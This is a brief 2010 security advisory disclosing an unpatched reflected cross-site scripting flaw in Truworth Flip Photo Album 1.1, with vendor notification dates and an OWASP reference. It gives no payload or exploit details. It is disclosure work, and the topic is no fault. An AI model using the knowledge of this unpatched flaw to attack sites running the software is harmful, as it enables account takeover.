Truworth Flip Photo Album 1.1 Cross-Site Scripting vulnerability

© 2010-11-13 ~ Brendan Coles <bcoles at gmail dot com>

Summary

There is a Cross-Site Scripting vulnerability in Truworth Flip Photo Album 1.1 which may allow an attacker to take control of the software if an authorized user browses a malicious page while logged in.

Software

Software Link: Truworth Flip Photo Album 1.1

Vulnerable Version: <= 1.1

Vendor Notification: rm@truworth.com at 2010-11-06 4:10AM

No reply from vendor by 2010-11-13. Advisory released.

Vulnerabilities

Reflected Cross-Site Scripting (XSS); does not require an authorized session; version 1.1; unpatched.

Reference

OWASP: Cross-Site Scripting (XSS)
